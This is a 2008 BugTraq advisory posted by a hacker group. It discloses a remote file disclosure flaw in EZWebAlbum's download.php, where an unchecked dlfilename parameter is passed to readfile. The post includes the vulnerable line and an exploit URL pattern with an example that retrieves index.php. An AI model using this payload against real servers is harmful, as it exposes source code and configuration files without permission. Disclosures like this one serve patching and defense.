BugTraq
EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability Jul 20 2008 12:12PM
Ghost hacker (ghost-r00t hotmail com)


########################################################################
##########################

EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability |, .-. .-. ,|

Found by : Ghost Hacker [ R-H TeaM ] | )(_o/ \o_)( |

My Site web : Real-hack.Net |/ /\ \|

########################################################################
##########################

[~] Found by : Ghost Hacker [ R-H TeaM ]

[~] Home page : www.Real-hack.net

[~] Email : Ghost-r00t (at) Hotmail (dot) com [email concealed]

[~] Name Script : EZWebAlbum

[~] Download Script : http://sourceforge.net/projects/ezwebalbum

###################################### [ Viva IslaM & KSA ] ######################################

[~] Error (download.php) :

readfile($dlfilename);

[~] Exploit :

http://xxxx/[path]/download.php?dlfilename=EVIL

[~] Example :

http://xxxx/[path]/download.php?dlfilename=index.php

###################################### [ Viva IslaM & KSA ] ######################################

[~] Greetz :

PROTO & QaTaR BoeZ TeaM & Aseg-Rabe7 & Dmar al3noOoz & 4Bo3tB & LeGeNd HaCkEr & Root Hacker ..

Qptan & ScarY.HaCkEr & EgYpTiaNxHaCkEr the-pirate.org & Mr.hope & My Blog[ gh0st10.wordpress.com ]

All Members Real Hack And All My Friends ..

########################################################################
##########################

Found by : Ghost Hacker [ R-H TeaM ]

########################################################################
##########################

_________________________________________________________________

Express yourself instantly with MSN Messenger! Download today it's FREE!

http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus